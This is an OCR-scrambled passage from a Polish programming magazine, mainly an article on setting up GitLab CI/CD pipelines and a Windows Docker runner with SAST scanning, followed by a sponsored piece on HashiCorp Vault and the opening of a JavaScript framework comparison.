jeżeli nasz projekt z założenia ma być roz-
wijany tylko w lokalnej chmurze firmy, ale
audytowany przez zewnętrzny podmiot,
to taka możliwość jest bardzo pożądana.
Doskonałym przykładem mogą być także
repozytoria, które rozwijamy na innych
platformach. Możemy na przykład skorzy-
stać z narzędzi CI/CD wraz z pipielinem od
GitLaba, ale projekt rozwijać na GitHubie.
Nasz pipeline możemy dowolnie rozwi-
jać, automatyzować i zmieniać. Na przykład
na Rysunku 5 widzimy, że po aktualizacji
<27>
BIBLIOTEKI I NARZĘDZIA

Rysunek 3. Widok wygenerowanych automatycznie zależności

Rysunek 4. Dashboard dodawania nowego projektu

<28> { 2 / 2022 < 101 > }

 / CI/CD jako nowoczesny workflow /

pliku konfiguracyjnego z trzech punków stał się on czteropunktowy. - echo $CI_COMMIT_REF_NAME

- echo $INLINE_GLOBAL_VARIABLE
Dodatkowo to od nas właściwie zależy, jak będzie wyglądała kolej- - echo $INLINE_LOCAL_VARIABLE
ność zależności między poszczególnymi punktami. - echo $CI_COMMIT_REF_NAME
- echo $CI_ENVIRONMENT_SLUG

test job1:
stage: test
script:
- echo "Programista"

test job2:
stage: test
script:
- echo "Programista"
only:
Rysunek 5. Zmiana wprowadzająca dodatkowy punkt w pipeline - branches
except:
- master
Listing 1. Konfiguracja zmiennych, punktów na pipeline i zadań testowych

stages:
- build
- test Kod widoczny w Listingu 1 już na pierwszy rzut oka powinien nam
- review dużo powiedzieć o możliwościach konfiguracyjnych. Widać, że punkty
- deploy
na pipeline definiowane są w postaci stages. Mamy także tutaj pokaza-
environment variables:
stage: build
ny sposób, w jaki definiujemy rodzaje zmiennych. Możemy wymienić
variables: zmienne globalne, lokalne i tak zwane domyślne, czyli generowane
INLINE_LOCAL_VARIABLE:
Local variable for Programista przez GitLaba. Piękno CI/CD polega na tym, że każde zadanie re-
script: alizowane na pipeline jesteśmy w stanie sami przeanalizować. W na-
- echo "Test scritpt here"
- echo "Here are defualt, global, szym przypadku możemy na przykład otworzyć environment variables
local varbailes..." i sprawdzić, jak przebiegał cały proces budowania – Rysunek 6.

Rysunek 6. Przebieg environment variables

{ WWW.PROGRAMISTAMAG.PL } <29>
BIBLIOTEKI I NARZĘDZIA
RUNNERS
GitLab Runner jest doskonałym zestawem narzędzi do skonfiguro-
wania automatycznego oraz ciągłego budowania naszej aplikacji i to
po każdej, nawet najmniejszej zmianie. Nie zawsze runnery będą
potrzebne i stosowane w projektach, ale uważam, że jeżeli jest taka
możliwość, to powinniśmy z nich korzystać i już piszę dlaczego.
Wyobraźmy sobie sytuację, w której mamy w zespole osoby odpo-
wiedzialne za zbudowanie czy to testowej, czy to finalnej aplikacji.
Każda z tych osób przygotowuje taką aplikację, oddaje do finalnych
testów i okazuje się, że zespół testowy nie jest w stanie uruchomić
jednej z nich lub nawet obydwóch. Oczywiście związane może to być
z szeregiem problemów; jednym z nich może być sytuacja, gdy osoby
odpowiedzialne za przygotowanie aplikacji posiadają inne środowi-
ska, na których dana aplikacja była budowana. Tego typu ograniczeń
możemy uniknąć właśnie dziękie GitLab Runner, który umożli-
wia budowanie naszej aplikacji zawsze na tym samym lub na wielu
przez nas przygotowanych środowiskach, a to pozwoli nam z dużą
dozą prawdopodobieństwa upewnić się, że tak zbudowana aplikacja
będzie się zachowywać po stronie użytkownika końcowego zgodnie
z założeniami projektowymi.
Rysunek 7. GitLab Runners – ustawienia
<30> { 2 / 2022
Runners są o tyle „fajne”, że możemy korzystać z tak zwanych sha-
red runners, czyli przygotowanych przez GitLaba lub użytkowników
gotowych środowisk. Z drugiej strony musimy pamiętać, że w takim
przypadku mamy do czynienia z sytuacją, w której nie będziemy
mieć pełnej wiedzy na temat samego środowisko, w jakim celu tak
naprawdę zostało ono zbudowane i jak długo będzie dostępne. Z tych
właśnie powodów zalecam oparcie wytwarzania aplikacji o nasze wła-
sne zasoby. Pozwoli to nam w pełni i od samego początku kontrolować,
jak nasze środowisko będzie skonfigurowane.
Rozpoczynając proces budowania własnego runnera, trzeba pod-
kreślić, jak wszechstronne jest to narzędzie. O możliwości korzysta-
nia ze współdzielonych już wspomniałem, ale to właśnie przy tworze-
niu własnego runnera ukazuje nam się cała potęga kryjąca się za tym
narzędziem. Chcemy stworzyć runner w oparciu o Linux, Windows,
a może macOS, Docker czy Kubernetes? W każdym z wymienionych
środowisk jesteśmy w stanie zainstalować i zbudować runner. Na po-
trzeby naszego przykładu przeprowadzimy instalację i konfigurację
runnera działającego na systemie operacyjnym Windows.
Na Rysunku 7 przedstawiony został widok strony konfiguracyjnej
runners, w której mamy dostęp do tokena, który z kolei będzie nam
potrzebny w dalszej części artykułu. Na Rysunku 7 znajduje się nato-
< 101 > }
 / CI/CD jako nowoczesny workflow /

miast informacja o przykładowych konfiguracjach w zależności od W ramach sprawdzenia, czy instalacja przebiegła poprawnie,
środowiska, a także możliwość skorzystania ze współdzielonych run- możemy na przykład w PowerShellu skorzystać z komendy docker
ners. Uwaga: widoczny token był wygenerowany dla już nieaktyw- version, która po udanej instalacji wyświetli informacje o wersji
nego testowego konta i wasz oczywiście będzie inny. Do tych usta- Dockera oraz silnika integracji – Rysunek 8.
wień przechodzimy, wybierając Settings -> CI/CD i klikając przycisk
Expand na opcji Runners.
Ustaliliśmy już, że najlepiej jest korzystać ze swojego własnego
runnera, dlatego naszą pierwszą czynnością powinno być wyłącze-
nie publicznie dostępnych i współdzielonych, co da nam pewność,
że nasz pipeline nie będzie z nich korzystał. Następnym krokiem jest
instalacja runnera, którą możemy w naszym przykładzie podzielić na
trzy etapy. Specjalnie użyłem słów „nasz przykład”, ponieważ to jest
właśnie czas, aby wspomnieć o kolejnej bardzo istotnej możliwości
runnera. Napomknąłem już o tym, że można go zainstalować na róż-
nych platformach, ale na tym wcale nie koniec, ponieważ sam run-
ner może wywoływać różne egzekutory. Oznacza to, że nasz projekt
możemy zbudować w oparciu o kontener, ale także w PowerShellu,
Bashu czy wirtualnej maszynie. Oczywiście nie wymieniłem wszyst-
kich możliwości, dlatego zachęcam do zapoznania się z oficjalną do-
kumentacją dostępną pod adresem docs.gitlab.com/runner/executors/.
W naszym przykładzie będziemy opisywać instalację Dockera, usłu-
gę oraz konfigurację samego runnera wraz z egzekutorem na wybra-
nym środowisku, którym będzie Windows.
Pierwszym etapem na naszej drodze do w pełni działającego Rysunek 8. Użycie komendy docker version
runnera powinna być instalacja w środowisku docelowym Docke-
ra. Proces ten jest praktycznie całkowicie automatyczny i wymaga Drugi etap instalacji należy rozpocząć od uruchomienia konsoli CMD
od nas tak naprawdę tylko ściągnięcia instalatora, a następnie po- lub PowerShell z prawami administratora i ściągnięcia z repozytorium
stępowania zgodnie z jego instrukcjami. Instalator możemy pobrać GitLaba runnera w postaci pliku wykonywalnego EXE. Następnie na-
z głównej strony pod adresem: desktop.docker.com/win/main/amd64/ leży zarejestrować nową usługę, bazując na pobranym przez nas pliku.
Docker%20Desktop%20Installer.exe Wyżej wymienione kroki zostały przedstawione na Rysunku 9.

Rysunek 9. PowerShell – instalacja runnera

{ WWW.PROGRAMISTAMAG.PL } <31>
BIBLIOTEKI I NARZĘDZIA

Etap trzeci i zarazem najbardziej newralgiczny to konfiguracja Możemy finalnie sprawdzić, czy runner prawidłowo się zare-
i rejestracja naszego runnera w portalu GitLab. Zanim przystąpimy jestrował i jest włączony, wchodząc na portal GitLab i przechodząc
do tych czynności, potrzebny będzie nam token naszego projektu. do Settings -> CI/CD i rozwinąć Runners. Na Rysunku 11 możemy
Jest on dostępny na portalu GitLab po przejściu w Settings -> CI/ zauważyć, że w moim przypadku pojawiły się dwa nowe runnery.
CD -> Runners (dla przypomnienia: przykładowy token i miejsce, Pierwszy z nich Windows_Docker został zarejestrowany przez wizard,
w którym możemy go znaleźć, zostały już zaprezentowane na Rysun- a drugi Programista_Docker przy użyciu zaprezentowanej w Listin-
ku 7). Po uprzednim zapisaniu lub skopiowaniu tokena jesteśmy już gu 2 komendy. Najważniejsze jest jednak to, że są w statusie Active
przygotowani do przeprowadzenia konfiguracji i rejestracji naszego (zielona kropka), czyli portal „widzi” je jako dostępne do uruchomie-
nowego runnera. Proces ten został przedstawiony na Rysunku 10. nia i wykorzystania.
Konfigurator podczas jego uruchomienia za pomocą komendy
.\GitLab-runner.exe register poprosi nas o kilka informacji,
takich jak URL projektu, token, opis, tag, a następnie o podanie eg-
zekutora i domyślnego obrazu, z którego ma on skorzystać. Wiemy,
że proces konfiguracji przebiegł pomyślnie, jeżeli – tak jak to zosta-
ło zaprezentowane na Rysunku 10 – otrzymamy zwrotną informację
o jego pozytywnym zarejestrowaniu. Nie jesteśmy tutaj zmuszeni ko-
rzystać z wizarda, ponieważ możemy użyć na przykład PowerShella
i podając wszystkie potrzebne dane, zarejestrować nasz runner za po-
mocą widocznego w Listingu 2 polecenia.

Listing 2. Komenda rejestrująca runner bez użycia wizarda

.\GitLab-runner.exe register `
--url https://gitlab.com/ `
--registration-token GR1348941JH `
--name Programista_Docker `
--tag-list programista,docker `
--executor docker `
--docker-image alpine:latest `
--docker......
/var/run/docker.sock
--docker-volumes /cache `
-n

Rysunek 11. Widoczne na portalu GitLab zarejestrowane przez nas runnery

Rysunek 10. Konfiguracja i rejestracja runnera

<32> { 2 / 2022 < 101 > }

 / CI/CD jako nowoczesny workflow /

Finalnie powinniśmy także przyjrzeć się bliżej konfiguracji i już nie połączonego socketa Dockera. Więcej informacji można znaleźć
spieszę z wyjaśnieniem, dlaczego jest to tak ważne. Plik konfigura- w oficjalnej dokumentacji GitLaba dostępnej pod adresem: docs.gi-
cyjny generowany jest na podstawie dostarczonych przez nas infor- tlab.com/ee/ci/docker/using_docker_build.html.
macji podczas instalacji i domyślnie znajduje się w folderze głównym Warto pamiętać, że ściągnięty przez nas plik wykonywalny GitLab-
ściągniętego przez nas i nazwanego pliku wykonywalnego. W moim -runner.exe to tak naprawdę bardzo potężne narzędzie. Zachęcam do
przypadku znaleźć go mogę w C:\GitLab-Runner\config.toml. W Li- analizy i zabawy z nim. Standardowe komendy w stylu .\GitLab-
stingu 3 możemy zobaczyć, jak wygląda konfiguracja. Widzicie róż- runner.exe czy .\GitLab-runner.exe register -h działają i są
nicę pomiędzy tymi dwoma runnerami? bardzo dobrze udokumentowane. Jest to także jeden z powodów, dla
których nie tłumaczę każdego ustawienia czy flagi. Możemy także za-
Listing 3. Prezentacja pliku konfiguracyjnego
wsze sprawdzić, jak się sprawują zarejestrowane runnery dzięki komen-
concurrent = 1 dzie .\GitLab-runner.exe verify czy użyć .\GitLab-runner.exe
check_interval = 0
run, który pokaże nam nawet napływające zadania z portalu. Może-
[[runners]]
name = "Windows_Docker" my również włączyć debug mode za pomocą komendy .\GitLab-
url = "https://gitlab.com/" runner.exe –debug run.
token = "HjhRFNv95Bx27seXsNPx"
executor = "docker" Wcześniej przyjrzeliśmy się bliżej konfiguracji pipeline, więc pew-
[runners.custom_build_dir] nie nikogo w tym miejscu nie zdziwi, że CI/CD zawiera jeszcze jedną
[runners.cache]
[runners.cache.s3] bardzo potężną funkcjonalność. Za pomocą dobrze skonfigurowa-
[runners.cache.gcs] nego runnera i pliku .gitlab-ci.yml jesteśmy w stanie przeprowadzić
[runners.cache.azure]
[runners.docker] deployment aplikacji i na przykład gotową paczkę lub obraz umieścić
tls_verify = false
image = "alpine:latest"
w lokalnym i, co najważniejsze, prywatnym repozytorium. W Listin-
privileged = false gu 4 znajduje się przykład takiego kodu, który należy umieścić w pli-
disable_entrypoint_overwrite = false
oom_kill_disable = false ku .gitlab-ci.yml.
disable_cache = false
volumes = ["/cache"] Listing 4. Skrypt generujący obraz i umieszczający go w lokalnym repozytorium
shm_size = 0
build image:
[[runners]] stage: build
name = "Programista_Docker" image: docker:latest
url = "https://gitlab.com/" services:
token = "Rnbu36Hs-inGaK_8gyU6" - docker:dind
executor = "docker" before_script:
[runners.custom_build_dir] - docker login -u "$CI_REGISTRY_USER" -p
[runners.cache] "$CI_REGISTRY_PASSWORD" $CI_REGISTRY
[runners.cache.s3] script:
[runners.cache.gcs] - docker build --pull -t
[runners.cache.azure] "$CI_REGISTRY_IMAGE" .
[runners.docker] - docker push "$CI_REGISTRY_IMAGE"
tls_verify = false
image = "alpine:latest"
privileged = false
GitLab przygotował dwa odrębne repozytoria. Package Registry po-
disable_entrypoint_overwrite = false
oom_kill_disable = false zwala na przetrzymywanie w prywatnym kontenerze przygotowanych
disable_cache = false
volumes = [....
różnego rodzaju paczek, natomiast Container Registry jest bezpiecz-
/var/run/docker.sock", "/cache"] nym i prywatnym repozytorium dla obrazów Dockera. Przygotowany
shm_size = 0
przez nas image jest generowany w instancji Docker i z tego właśnie
powodu obraz ten będzie znajdował się w Packages & Registries ->
Różnica nie jest na pierwszy rzut oka tak wyraźnie widoczna, a ogra- Container Registry – Rysunek 12. Tak naprawdę jest to gotowy obraz,
niczenia dotyczące szerokości łamów w czasopiśmie sprawiają, że jest do którego możemy się odnosić lub wypchnąć na produkcję, lub też
to jeszcze mniej rzucające się w oczy. Zwróćmy jednak uwagę na li- wykonać na jego podstawie backup czy też zewnętrzne review.
nijkę, która odpowiada za konfigurację wolumenów: W ramach opisywanego przykładu zamieszczam w Listingu 5 ca-
łość pliku .gitlab.ci.yml i zachęcam także do zapoznania się z doku-
Windows_Docker:
volumes = ["/cache"] mentacją dostępną na stronie: docs.gitlab.com/ee/ci/yaml/gitlab_ci_
yaml.html. Nie wszystko wspólnymi siłami omówiliśmy, ale mam
Programista_Docker: nadzieję, że na tyle dużo, by zmobilizować do dalszego eksperymento-
volumes = ["/var/run/docker.sock:/var/run/docker.sock", "/cache"]
wania i poznawania tej fascynującej ścieżki nowoczesnego workflow.

Listing 5. Cały skrypt napisany w pliku .gitlab-ci.yml

Jest to o tyle ważne, że wygenerowane ścieżki przez wizarda będą mieć
w przypadku Dockera tylko ścieżkę /cache jako wolumen. W takim image: docker:latest

przypadku podczas niektórych zadań, takich jak na przykład wypy- variables:

INLINE_GLOBAL_VARIABLE:
chanie gotowej aplikacji do repozytorium, pipeline będzie generował Global variable for Programista
błąd 1 (problem z socketem) lub 127 (brak obrazu Docker), a sama stages:
operacja nie powiedzie się. Błąd ten jest związany z brakiem domyśl- - build

{ WWW.PROGRAMISTAMAG.PL } <33>
BIBLIOTEKI I NARZĘDZIA

- test stage: deploy

- review script: echo "Deploy release"
- deploy environment:
name: staging
environment variables: needs:
stage: build - job: test job1
variables:
INLINE_LOCAL_VARIABLE: build image:
Local variable for Programista stage: build
script: image: docker:latest
- echo "Test scritpt here" services:
- echo "Here are defualt, - docker:dind
global, local varbailes..." before_script:
- echo $CI_COMMIT_REF_NAME - docker login -u "$CI_REGISTRY_USER" -p
- echo $INLINE_GLOBAL_VARIABLE "$CI_REGISTRY_PASSWORD" $CI_REGISTRY
- echo $INLINE_LOCAL_VARIABLE script:
- echo $CI_COMMIT_REF_NAME - docker build --pull -t
- echo $CI_ENVIRONMENT_SLUG "$CI_REGISTRY_IMAGE" .
- docker push "$CI_REGISTRY_IMAGE"
test job1:
stage: test sast:
script: stage: test
- echo "Programista" include:
- template: Security/SAST.gitlab-ci.yml
test job2:
stage: test
script:
- echo "Programista"
only: DEVSECOPS – EWOLUCJA CZY
- branches
except:
REWOLUCJA?
- master
Ustaliliśmy już, że DevOps jako połączenie światów programowania
deploy review:
stage: review i infrastruktury doskonale sprawdza się i usprawnia pracę nad pro-
script: jektami. Na przełomie kilku ostatnich lat stało się jednak jasne, że
- echo "test deploy for Programista"
needs: taka szybkość popularyzowania IT w dosłownie wszystkich branżach
- job: test job1 i odnogach gospodarki niesie ze sobą nowy, bardzo istotny problem.
deploy release: Szeroko pojęte bezpieczeństwo stało się jedną z najważniejszych kwe-
stii każdego projektu. Codzienne nowo wykryte drobne luki, podat-

Rysunek 12. Lokalne repozytorium z przygotowanym obrazem

Rysunek 13. Narzędzia SAST – automatyczne raporty

<34> { 2 / 2022 < 101 > }

 / CI/CD jako nowoczesny workflow /

ności typu 0day czy co jakiś czas pojawiające się „końce świata” typu
Log4Shell (CVE-2021-44228) już dawno utwierdziły w przekonaniu
nie tylko scenę IT, ale także CEO, prezesów i klientów, że bezpieczeń-
stwo to jeden z najważniejszych aspektów każdego projektu.
Jeszcze kilka lat temu klient pytający o bezpieczeństwo czy backup
jego aplikacji był dosłownie abstrakcją, a obecnie pojawia się już na
początku rozmowy. Takie podejście cieszy, ale i pokazuje, jak bardzo
zmienił się świat. Z tego powodu DevOps ewoluowało w DevSecOps.
Tutaj także z pomocą przychodzi nam CI/CD, który dobrze skon-
figurowany sprawi, że nasza aplikacja będzie zawsze prawidłowo
przetestowana, także pod kątem bezpieczeństwa. Trzeba oczywiście
pamiętać o tym, że przygotowane testy sprawdzające nasz projekt po-
winny być co jakiś czas rewidowane i sprawdzane. Prawda jest taka,
że nowoczesny workflow to taki, w którym każda nowa funkcjonal-
ność aplikacji jest testowana i audytowana. Automatyzacja naszego
workflow może bardzo usprawnić i przyspieszyć pracę, ale tylko wte-
dy, gdy jest dobrze skonfigurowana i często kontrolowana.
W zaprezentowanym wcześniej Listingu 5 możemy zaobserwo-
wać, że zostały włączone narzędzia Static Application Security Te-
sting (SAST), które automatycznie przeanalizują nasz projekt pod
kątem znanych podatności. Zadania, które zostały dodane do nasze-
go pipeline po włączeniu SAST, są z kolei widoczne na Rysunku 3.
Dodatkowo po wykonaniu się zestawu testów wchodzących w skład
SAST mamy możliwość ściągnięcia automatycznie wygenerowanego
raportu – Rysunek 13.
Oczywiście same testy wchodzące w skład SAST można rozwijać
i dodawać. Należy też wspomnieć, że nie jest to jedyna wbudowana
w GitLab możliwość sprawdzania naszego projektu pod kątem bez-
pieczeństwa. Zachęcam do sprawdzenia zakładki Security & Com-
pliance - > Configuration oraz oficjalnej dokumentacji dostępnej pod
adresem docs.gitlab.com/ee/user/application_security/.
PODSUMOWANIE
Celem tego artykułu było nie tylko przedstawienie podstaw funkcjo­
nowania CI/CD, ale także zaszczepienie w czytelniku chęci ekspery­
mentowania z nowoczesnym, opartym o metodologię kryjącą się za
DevOps, workflow. Jednym z głównych założeń było także przybli-
żenie zestawu narzędzi wchodzących w skład CI/CD oraz zwróce-
nie uwagi, że automatyza­cja zadań może być bardzo pomocna dla
nas i naszego zespołu. Trzeba oczywiście pamiętać, że to nie koniec
zabawy, bowiem CI/CD skrywa jeszcze wiele tajemnic, ale mam na-
dzieję, że lektura tego artykułu spra­wiła, że zapragniecie odkryć każ-
dą z nich już na własną rękę!

MICHAŁ ZBYL
michal.zbyl@gmail.com

Artykuł napisany został przez wariata, na co dzień pracownika UBS, w którym projektuje i wdraża mały bank w dużym banku.
Dla śmieszności wydarzeń wystarczy dodać, że planuje, konfiguruje i wdraża Infrastrukturę IT od sieci po całe serwerownie
tu i tam. Stawia na VMware i uważa, że kontenery nie sprawdzają się wszędzie. Czasem żeby udowodnić, że na pewno wariat,
zaliczy sobie taki czy inny certyfikat z języka japońskiego.

/* REKLAMA */

{ WWW.PROGRAMISTAMAG.PL } <35>
 SKARBIEC NA STRAŻY
SEKRETÓW. JAK VAULT
USPRAWNIA KOMUNIKACJĘ
W KUBERNETESIE
Podczas gdy firmy przestawiły się na model pracy zdalnej, globalna
pandemia wysunęła technologię chmury na pierwszy plan. Teraz
pracownicy wracają do biur, ale element pracy zdalnej powinien zo-
stać w sektorze IT już na stałe. Z jednej strony duża elastyczność,
automatyzacja, redukcja kosztów, wydajność i dostęp do zasobów
z każdego miejsca świata, a z drugiej – bezpieczeństwo. W tych cza-
sach – wzmożonej cyberprzestępczości i zakłóconego ładu na świe-
cie – wysuwa się ono na pierwszy plan jeszcze bardziej. W Comarch
Cloud i Security są nieodłącznym elementem pracy. Ale to niejedy-
ne obszary IT, które czekają na studentów w ofercie letnich stażów.

<36> { MATERIAŁ INFORMACYJNY }

 Trzymiesięczny staż to sposób na start kariery zawodowej w bran-
ży IT. A ta stawia przed deweloperami coraz więcej wyzwań. Świat
„ucieka” do chmury, dla której „systemem operacyjnym” stał się nie-
jako Kubernetes. Lekkie i przenośne kontenery umożliwiają automa-
tyzację zadań, skalowalność infrastruktury, jej migrację, a także po-
zwalają budować szybciej i łatwiej. Wykorzystywanie kontenerów nie
jest jednak wolne od wyzwań. Trzeba optymalizować procesy CI/CD,
dobierać odpowiednie narzędzia, a przede wszystkim postawić na
bezpieczeństwo. To aspekt, który w Comarch stawiany jest na wyso-
kim miejscu w procesie tworzenia oprogramowania. Ale oprócz spe-
cjalistów ds. cyberbezpieczeństwa, Comarch czeka na programistów,
inżynierów systemowych, deweloperów aplikacji mobilnych, oferuje
także staże w obszarze telekomunikacji, embedded, czy AI/ML.
Przed stażystami odbywającymi staż w Centralnym Zespole Kom-
petencyjnym Cybersecurity stoją możliwości nauki szeroko poję-
tych technologii DevSecOpsowych, automatyzacji procesów czy
bezpiecznych rozwiązań chmurowych. Duży nacisk stawiamy na
narzędzia wspomagające wytwarzanie bezpiecznego oprogramo-
wania oraz implementację bezpiecznych procesów CI/CD – mówi
Kamil Migacz, menadżer zespołu ds. cyberbezpieczeństwa
w sektorze CZK.
Cyberbezpieczeństwo to oczywiście także testy penetracyjne i dbanie
o bezpieczeństwo aplikacji. Zarówno tradycyjnych, jak i tych chmu-
rowych. Jak za tym wszystkim nadążyć i zapewnić, aby aplikacje były
bezpieczne?
VAULT – GAME
CHANGER W ZARZĄDZANIU
HASŁAMI
Wymiana haseł, certyfikatów, credentiali i kluczy, potrzebnych apli-
kacjom do działania od początków Kubernetesa pozostaje dużym
wyzwaniem. Co prawda K8s oferuje zasoby do zabezpieczenia sieci
i komunikacji, takie jak wbudowane sekrety, ale ich funkcjonalność
jest ograniczona tylko do jego wewnętrznej infrastruktury. Ponadto
sekrety przechowują credentiale jako ciągi zakodowane w base-64,
jednak w żaden sposób niezaszyfrowane. Istnieją oczywiście narzę-
dzia do zwiększenia bezpieczeństwa przechowywanych sekretów, ale
im większa infrastruktura, tym większe wyzwanie w kwestii zarzą-
dzania credentialami.
Tu z pomocą przychodzi Hashicorp Vault – darmowe narzędzie
open-source służące do scentralizowanego zarządzania sekretami –
credentialami baz danych, kluczami API, danymi logowania, tokena-
mi, certyfikatami TLS. Funkcjonuje w środowisku chmurowym, ale
też tradycyjnym.
Vault gwarantuje, że wszystkie te dane są przechowywane w po-
staci szyfrowanej, tak samo jak szyfrowana jest komunikacja między
nim samym a użytkownikiem czy aplikacją. Dodatkowo umożliwia
tworzenie dynamicznych sekretów, to znaczy takich, które są waż-
{ MATERIAŁ INFORMACYJNY }
ne przez określony czas – np. tylko na czas wykonywania skryptu
– i unikalnych dla poszczególnych klientów. Może być także używany
do szyfrowania i deszyfrowania danych „in-transit”, oferując usługę
Encryption as a Service, co oznacza, że jego interfejs API zwróci za-
szyfrowane lub odszyfrowane dane bez ich przechowywania. Moż-
na to wykorzystać w celu szyfrowania własnych danych aplikacji,
np. w bazie danych. Vault bowiem nie szyfruje samych danych, a klu-
cze dostępowe do nich i bezpiecznie je przechowuje.
Te wszystkie informacje muszą być oczywiście gdzieś przecho-
wywane. Vault wymaga backendu, który pełni funkcję pamięci dla
tego narzędzia. Możliwych rozwiązań jest wiele, a jednym z nich jest
Consul, który zapewnia wysoką dostępność usługi i skalowalność.
A oprócz tego ma wiele innych funkcjonalności – m.in. Service Di-
scovery do wykrywania usług przez klientów, Health Checking do mo-
nitorowania kondycji klastra czy Service Mesh do zestawiania wza-
jemnych połączeń TLS pomiędzy aplikacjami.
WEJŚĆ DO SKARBCA
Po uruchomieniu Vault startuje w stanie sealed. Jest zapieczętowany
– wie, gdzie dane są przechowywane, ale nie jest w stanie ich odszy-
frować. Innymi słowy: wejście do skarbca jest niemożliwe. To dzieje
się po restarcie, a więc m. in. w przypadku awarii poda czy całego
klastra. W celu zapewnienia ciągłego działania usługi i uniknięcia tak
rozległych awarii należy zapewnić jej wysoką dostępność. Rekomen-
dowane jest stworzenie co najmniej trzech replik Vaulta i Consula.
Każdy pod ma dwa kontenery – jeden to Consul Agent do łączenia
się z klastrem Consula, a drugi to instancja Vaulta.
Mechanizm odpieczętowania (ang. unseal) jest kluczową funk-
cjonalnością narzędzia i daje możliwość odszyfrowania i dostępu
do przechowywanych i szyfrowanych w Vaulcie danych. Domyślnie
Vault skonfigurowany jest do procesu manualnego odpieczętowania,
co oznacza, że wymaga ręcznej pracy administratora. To działanie
oparte jest na algorytmie Shamir’s Secret Sharing, w którym klucz do
unsealowania jest dzielony na kilka części, odłamków (domyślnie: 5).
Jego rekonstrukcja jest możliwa dzięki wykorzystaniu określonej liczby
odłamków (domyślnie: 3 z 5). Podanie ich umożliwia uzyskanie klu-
cza szyfrowania, który wykorzystywany jest do odszyfrowania klucza
głównego, odpowiedzialnego za szyfrowanie sekretów wewnątrz Vault.
Po tej operacji dostęp do wszystkich credentiali jest już możliwy.
A GDZIE W TYM WSZYSTKIM
AUTOMATYZACJA?
Współczesny świat dąży do automatyzowania praktycznie wszystkie-
go, co możliwe, i nie inaczej jest w Vault. Manualny proces odpie-
czętowania skarbca mógłby być żmudny i nieefektywny. W tym celu
potrzebny jest automat, który obsłuży zapieczętowany skarbiec do
dalszej pracy. Na szczęście Hashicorp oferuje takie rozwiązanie, które
może być osiągnięte na kilka różnych sposobów.
<37>
 Powszechnym rozwiązaniem jest podpięcie Hashicorp Vault do
zewnętrznej chmury publicznej, którą skarbiec może wykorzystać do
przechowywania klucza głównego i pobierania go stamtąd. Doku-
mentacja przedstawia przykłady powiązania Vaulta m.in. z AliCloud
KMS, AWS KMS, Azure Key Vault, GCP Cloud KMS czy OCI KMS.
Vaulta można zintegrować też ze Sprzętowym Modułem Bezpieczeń-
stwa (ang. Hardware Security Module), albo wykorzystać do pomocy
drugą instancję Vaulta. Społeczność wynalazła też budżetową wersję
auto-unsealowania z wykorzystaniem cron job.
Jeśli nie mamy do dyspozycji zewnętrznej chmury, wersją może
być wykorzystanie drugiej instancji Vaulta, wystawionej docelowo –
najlepiej – w osobnym klastrze Kubernetesa. W ten sposób krytyczne
systemy są izolowane, działają niezależnie od siebie, jeden Vault jest
w stanie przejąć rolę drugiego, gdy jego wszystkie repliki odmówią
posłuszeństwa. Tzw. Transit seal umożliwia dwóm Vaultom automa-
tyczne wzajemne się odpieczętowywanie.
To rozwiązanie daje inne podejście do problemu, ale niekoniecz-
nie jest tańsze – wymaga bowiem większych zasobów. A jeśli nie, to
trzeba pójść na kompromis, kosztem mniejszej izolacji komponen-
tów od siebie i ewentualnej awaryjności. Co jednak, jeśli taka awaria
się wydarzy, zatrzasną się oba Vaulty pracujące w trybie transit albo
stracimy dostęp do chmury, której zadaniem był auto-unseal naszego
Vaulta, trzymający wszystkie nasze hasła?
FIVE NINES
Wysoka dostępność to dzisiaj jedno z najważniejszych wyzwań,
przed którymi stoją dostawcy usług chmurowych. Pięć dziewiątek
i więcej oznacza już wysoką dostępność. Także w Vaulcie trzeba być
<38> { MATERIAŁ INFORMACYJNY }
gotowym na krytyczne scenariusze. Dokumentacja Hashicorp nie
jest w tym temacie zbyt obszerna, ale z pomocą przychodzą doświad-
czenia społeczności. Ponieważ nie ma możliwości zmiany trybu od-
pieczętowania skarbca, gdy jest on w stanie sealed, do pomocy można
zastosować trzecią instancję Vaulta i odpowiedniego przepięcia kon-
figuracji w celu wykorzystania go do auto-unsealowania. Ta operacja
będzie wymagała też manualnej pracy administratora. Istnieje też
możliwość manualnego odzyskania klucza do unsealowania, ale tu
obawy dotyczą konieczności przechowywania go w formie plaintext
i przekazania go do trzeciego Vaulta. Hashiscorp oferuje wiele róż-
nych podejść do wdrożenia Vaulta i to od administratora zależy, jakie
wybierze. Jak zawsze – każde ma wady i zalety.
NIEKOŃCZĄCY SIĘ PROCES
Bezpieczeństwo w Kubernetesie jest dziś jednym z wyzwań, przed
jakimi stoją administratorzy chmury. Może się wydawać trudne do
osiągnięcia, ale często główną przyczyną wycieków wrażliwych da-
nych nie są błędy w oprogramowaniu, a błędy administratora. Vault
daje w tym zakresie duże możliwości, dlatego poprawne jego wdro-
żenie i zadbanie o wszystkie kwestie bezpieczeństwa, od TLS po od-
powiednią izolację komponentów, może zapewnić znaczącą ochronę
krytycznego miejsca chmurowej infrastruktury dla twoich aplikacji.
Ale bezpieczeństwo nie kończy się na Vaulcie. To ciągły proces: mo-
nitorowania, analizowania, testowania, łatania podatności i wdraża-
nia. I tak w kółko –niezależnie od tego, czy korzystamy z własnych
zasobów, czy z chmury.
Mateusz Kaleta
PROGRAMOWANIE APLIKACJI WEBOWYCH
Porównanie technologii JavaScript do tworzenia aplikacji
webowych
Obecnie najczęściej wykorzystywanymi technologiami do tworzenia frontendu aplikacji we-
bowych są frameworki oparte na języku JavaScript. Najpopularniejszymi rozwiązaniami na
rynku są React.js, Angular oraz Vue.js. Wybór odpowiedniej technologii jest złożonym proble-
mem ze względu na liczbę kryteriów związanych z danym projektem. W jaki sposób wybrać
bibliotekę najlepiej dopasowaną do naszych potrzeb?
ROZWÓJ TECHNOLOGII
FRONTENDOWYCH
Na przestrzeni ostatniego dziesięciolecia możemy zauważyć znaczą-
cy wzrost odsetku aplikacji internetowych w udziale procentowym
budowanych rozwiązań informatycznych. Rozwiązania webowe,
w wielu zastosowaniach, stanowią dobrą alternatywę dla oprogramo-
wania desktopowego i mobilnego, którego instalacja wymaga zuży-
cia zasobów pamięciowych i czasowych. Dodatkową zaletą aplikacji
internetowych jest brak konieczności publikowania osobnych paczek
dla różnych systemów operacyjnych. Rozwiązaniem dla tego proble-
mu może być skorzystanie z takich technologii jak Electron [0] czy
Cordova [1], które jednak cały czas opierają się na technologiach
webowych. Początkowe rozwiązania internetowe oparte były na
budowaniu statycznych plików HTML wraz ze skryptami w języku
